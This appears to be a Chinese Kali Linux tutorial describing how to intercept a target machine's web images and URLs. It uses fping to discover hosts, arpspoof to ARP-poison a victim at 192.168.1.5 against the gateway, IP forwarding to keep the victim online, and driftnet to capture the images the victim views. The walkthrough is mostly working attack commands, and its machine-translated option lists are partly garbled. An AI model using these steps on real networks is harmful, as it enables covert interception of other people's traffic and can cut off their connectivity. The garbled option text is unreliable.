1. 程式人生 > >kali之獲取靶機的圖片和看的url

kali之獲取靶機的圖片和看的url

獲取 home for CM cidr 情況下 family 宕機 face

需要用到 fping工具 用-asg參數

調查選項:

-4ipv4只能ping ipv4地址

-6——ipv6只在ping ipv6地址

-b——大小=字節數量的ping數據以字節的方式發送(默認為:56)

-B——backoff=N設置指數backoff因子到N(默認值:15)

——count=N計數模式:向每個目標發送Nping信號

-f文件=文件讀取目標文件的文件列表(-表示stdin)

-g——生成生成目標列表(只有在沒有-f指定的情況下)

(在目標列表中給出開始和結束IP,或者是CIDR地址)

(例如,fping-g 192.168.1.0 192.168.1.255fping-g 192.168.1.0/24)

-Httl=N設置了IP ttl(用於實時跳轉的時間)

——iface=iface綁定到一個特定的接口

-l——循環循環模式:永遠發送ping信號

-m,全部使用提供主機名的ip(IPv4IPv6),使用-A

-dontfrag設置了不分段標記

-O-tos=NICMP包中設置了服務的類型(tos)標誌

-p-周期=MSEC間隔到一個目標(ms)

(在循環和計數模式中,默認值:1000毫秒)

-r,重試=N的重試次數(默認值:3)

-R——隨機隨機分組數據(用來挫敗鏈接數據壓縮)

-S-src=IP集源地址

-t-超時=MSEC單獨的目標初始超時(默認為500毫秒,

除了-l/-c/-c,它是

-p期到2000毫秒)

輸出選項:

-a,活著的目標是活著的

-A-addr通過地址顯示目標

-Cvcount=N-C,以詳細格式報告結果

——在每個輸出行之前,時間戳打印時間戳

-e——在返回的包中運行的時間

-i-間隔=MSEC間隔發送ping(默認值:10毫秒)

-n,名稱以名稱顯示目標(-d是等價的)

-N-netdata輸出可兼容netdata(-l-Q是必需的)

-o-停機顯示了累計的宕機時間(丟失的包包間隔)

-q-安靜的安靜(不要顯示每一個目標/每平的結果)

-Q-s=SECS-Q相同,但每n秒顯示一次

-s,統計打印最終數據

-u-無法到達的目標是無法到達的

- v,版本顯示的版本

查看你掃描到的ip

開啟arp欺騙用 arpspoof -i eth0 -t 192.168.1.5 192.168.1.1

選項

- i 指定要使用的接口。

- c的主機| |

在恢復arp映射時指定使用哪個硬件地址

成形;在清理時,可以用自己的包發送數據包

地址和主機地址。發送的數據包

一個虛假的hw地址會破壞與某些特定的連接

轉換/ap/橋配置,但是它更可靠

而不是使用自己的地址,這是arps的默認方式

事後清理。

- t目標

指定一個特定的主機到ARP毒藥(如果沒有指定的話

局域網主機)。重復指定多個主機。

-r毒害兩個主機(主機和目標)以捕獲兩者的通信量

的方向。(只在與-t的聯合中有效)

主機指定要截獲數據包的主機(通常是

本地網關)

反饋成功後靶機斷網(arp攻擊)

關掉進程

開啟本地的ip轉發

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

在進行(arp欺騙) arpspoof -i eth0 -t 192.168.1.5 192.168.1.1

目標可以上網

使用root@kali:~# driftnet -i eth0 工具查看靶機瀏覽的圖片信息

選項:

-h顯示這個幫助信息。

- v詳細操作。

- b當一個新圖像被捕獲時,b蜂鳴。

-i接口選擇要監聽的接口(默認:所有

接口)

-f文件而不是監聽接口,讀取捕獲

來自pcap轉儲文件的數據包;文件可以是命名管道

用於與Kismet或相似的用途。

-p不把監聽接口設置為混亂模式。

輔助模式:不要在屏幕上顯示圖像,而是保存

將它們放到一個臨時目錄中,並在上面公布它們的名稱

標準輸出。

在臨時目錄中保存的圖像的最大數量

在兼職模式。

-d目錄使用指定的臨時目錄。

-x前綴在保存圖像時使用。

-s嘗試從網絡中提取音頻數據,

除了圖像。目前,這支持MPEG數據

只有。

-S提取音頻流,而不是圖像。

-M命令使用給定的命令來播放MPEG音頻數據

s選項;這應該處理MPEG

提供的標準輸入。默認值:“mpg123——”

主要參數:

-b 捕獲到新的圖片時發出嘟嘟聲

-i interface 選擇監聽接口

-f file 讀取一個指定pcap數據包中的圖片

-p 不讓所監聽的接口使用混雜模式

-a 後臺模式:將捕獲的圖片保存到目錄中(不會顯示在屏幕上)

-m number 指定保存圖片數的數目

-d directory 指定保存圖片的路徑

-x prefix 指定保存圖片的前綴名

使用舉例:

1.實時監聽: driftnet -i wlan0

2.讀取一個指定pcap數據包中的圖片: driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/

kali之獲取靶機的圖片和看的url